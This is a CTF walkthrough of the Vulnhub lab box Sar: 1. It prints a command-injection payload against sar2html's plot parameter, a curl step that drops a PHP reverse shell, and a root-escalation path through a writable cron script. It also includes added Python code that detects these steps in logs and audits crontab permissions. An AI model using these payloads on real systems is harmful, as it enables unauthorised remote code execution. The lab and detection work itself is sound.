Vulnhub Sar: 1 Walkthrough

It's been a while since I've written up a box and Vulnhub just dumped a fresh batch so here we go...

The box description states: "Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing."

This is a solid entry level box. Nothing complicated and going through standard enumeration should lead to a low privilege shell and root.

We kick off with Nmap:

With only port 80 open, our options are limited. Firing up Nikto:

A phpinfo file but aside from that, slim pickin's. Looking at the web port in the browser:

Checking out robots.txt:

Ok, that's interesting. We find this sar2html app:

As I'm poking around, I find this ?plot= page and I wonder if it's vulnerable to XSS:

It's hard to see but I'm terminating the statement and adding a command: ?plot=;id

Excellent! We have code execution. I decide to look this up on Exploit-db:

We basically learn what we've already uncovered:

I come back with: ?plot=;curl --output rshell443.php

Which basically writes a Pentest Monkey reverse shell to the web directory. When we browse to our shell:

We catch our shell:
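The ?plot=;id probe and the follow-up request that drops rshell443.php both leave a distinctive trail in the web server's access log. The Python below is an added example for this walkthrough, not code from the post or from the sar2html project: it flags query values that contain shell metacharacters, and then flags requests from the same client to a .php path that nobody had requested before the injection, which is what a freshly written webshell looks like from the server side. The log lines, client addresses and the /sar2html/index.php path are constructed for illustration.

```python
"""Spot command-injection attempts and a dropped webshell in an access log.

Added example for this walkthrough; it is not code from the post or from the
sar2html project. Log lines, client addresses and the /sar2html/index.php
path are constructed for illustration.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Apache/nginx "combined" format: client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Any of these lets a value break out of a shell command it is spliced into.
SHELL_META = re.compile(r'[;&|`$]')

# Constructed sample: a normal sar2html request, the ?plot=;id probe, the
# percent-encoded curl drop from the post, a hit on the new PHP file, and an
# unrelated client fetching robots.txt.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Feb/2020:10:01:12 +0000] "GET /sar2html/index.php?plot=Linux HTTP/1.1" 200 5120
192.0.2.10 - - [20/Feb/2020:10:02:45 +0000] "GET /sar2html/index.php?plot=;id HTTP/1.1" 200 5311
192.0.2.10 - - [20/Feb/2020:10:03:09 +0000] "GET /sar2html/index.php?plot=%3Bcurl%20--output%20rshell443.php HTTP/1.1" 200 5300
192.0.2.10 - - [20/Feb/2020:10:04:30 +0000] "GET /rshell443.php HTTP/1.1" 200 0
198.51.100.7 - - [20/Feb/2020:10:05:00 +0000] "GET /robots.txt HTTP/1.1" 200 14
"""


def parse_query(query):
    """Split a query string on '&' only and percent-decode each pair.

    urllib.parse.parse_qs is avoided on purpose: Python versions before 3.9.2
    also split on ';', which would hide exactly the ';id' payload we look for.
    """
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_log(lines):
    """Return a list of findings, in log order.

    kind == 'shell-metachar': a query value contained a shell metacharacter.
    kind == 'new-php-path':   a client already flagged above then requested a
                              .php path nobody had requested before.
    """
    findings = []
    seen_paths = set()
    flagged_clients = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m['client'], m['target']
        parts = urlsplit(target)
        hits = [(n, v) for n, v in parse_query(parts.query) if SHELL_META.search(v)]
        for name, value in hits:
            findings.append({'kind': 'shell-metachar', 'client': client,
                             'time': m['time'], 'param': name, 'value': value,
                             'status': m['status']})
        if hits:
            flagged_clients.add(client)
        elif (client in flagged_clients and parts.path.endswith('.php')
              and parts.path not in seen_paths):
            findings.append({'kind': 'new-php-path', 'client': client,
                             'time': m['time'], 'path': parts.path,
                             'status': m['status']})
        seen_paths.add(parts.path)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f)
```

Run against the constructed sample it reports the two injected plot values and the first request for /rshell443.php. A 200 on a previously unseen .php path right after a metacharacter hit is the higher-confidence signal of the two; on its own, a metacharacter in a query string is only a lead to be checked against the application's expected inputs.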

Snagging the user flag:

A little enumeration and we uncover a cron job:

We dig into the script:

We can't write into but we can write into

Reusing the shell we already have on the system, we call it from PHP and we wait (5 minutes) and:

We catch our shell and we go after the root flag. #gameover
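The privilege escalation above rests on a root cron job whose script pulls in a file from a location a low-privilege user can write to. As an added example (not code from the post), the Python below is the audit a defender would run to catch that pattern: it parses an /etc/crontab-style file, finds the program each job runs, extracts the absolute paths that program references, and reports any path, or parent directory, that is writable by group or others, owned by an untrusted uid, or missing. The crontab text, the run_reports.sh and collect.sh names and the directory layout are constructed in a temporary directory; because the demo cannot create root-owned files, it treats the current uid as trusted alongside uid 0.

```python
"""Audit cron jobs for scripts that root runs but a lower-privileged user can alter.

Added example for this walkthrough; it is not code from the post. The crontab
text, the run_reports.sh / collect.sh names and the directory layout are
constructed in a temporary directory for illustration.
"""
import os
import re
import stat
import tempfile

# /etc/crontab style: five time fields (or an @keyword), the user, then the command.
CRON_LINE = re.compile(r'^(?:@\S+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<command>.+)$')
ABS_PATH = re.compile(r'(?<![\w.])/[\w./-]+')

# Constructed crontab: one root job every five minutes, plus a comment and an env line.
SAMPLE_CRONTAB = """\
# constructed sample, not the box's real crontab
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root {prefix}/opt/maint/run_reports.sh
"""


def parse_system_crontab(text):
    """Return (user, command) for every active job line."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or re.match(r'^\w+=', line):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m['user'], m['command']))
    return jobs


def weak_perms(path, trusted_uids):
    """Reasons an untrusted user could change what this path resolves to."""
    try:
        st = os.stat(path)      # follow symlinks: this is what cron would execute
    except FileNotFoundError:
        return ['missing']      # combined with a writable parent dir, anyone can supply it
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append('world-writable')
    if st.st_mode & stat.S_IWGRP:
        reasons.append('group-writable')
    if st.st_uid not in trusted_uids:
        reasons.append('owned by uid %d' % st.st_uid)
    return reasons


def audit_crontab(text, trusted_uids=(0,)):
    """Check each job's program, every absolute path it references, and their directories."""
    findings = []
    for user, command in parse_system_crontab(text):
        program = command.split()[0]
        targets = [program]
        if os.path.isfile(program):
            with open(program, errors='replace') as fh:
                targets += ABS_PATH.findall(fh.read())
        checked = set()
        for t in targets:
            for path in (t, os.path.dirname(t)):
                if path in checked:
                    continue
                checked.add(path)
                reasons = weak_perms(path, trusted_uids)
                if reasons:
                    findings.append({'user': user, 'command': command,
                                     'path': path, 'reasons': reasons})
    return findings


def demo():
    """Build the constructed layout in a temp dir and audit it.

    The root-run script sources collect.sh, which is world-writable (0777);
    that single file is the expected finding.
    """
    prefix = tempfile.mkdtemp()
    for d in ('/opt/maint', '/var/reports'):
        os.makedirs(prefix + d)
        os.chmod(prefix + d, 0o755)         # explicit, so the umask cannot skew the result
    script = prefix + '/opt/maint/run_reports.sh'
    helper = prefix + '/var/reports/collect.sh'
    with open(script, 'w') as fh:
        fh.write('# constructed maintenance script run by root from cron\n. %s\n' % helper)
    with open(helper, 'w') as fh:
        fh.write('# constructed helper living in a directory any user can write to\n')
    os.chmod(script, 0o755)
    os.chmod(helper, 0o777)
    me = os.getuid() if hasattr(os, 'getuid') else 0
    return audit_crontab(SAMPLE_CRONTAB.format(prefix=prefix), trusted_uids=(0, me))


if __name__ == '__main__':
    for f in demo():
        print('%(user)s runs %(command)s -> %(path)s: %(reasons)s' % f)
```

The fix on a real host is the mirror image of the check: everything a root cron job executes or sources, and every directory on the way to it, must be owned by root and not writable by group or others. Checking the parent directory matters as much as the file, since a writable directory lets a user replace the file outright even when the file's own mode looks safe.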

Fun little box.

© 2020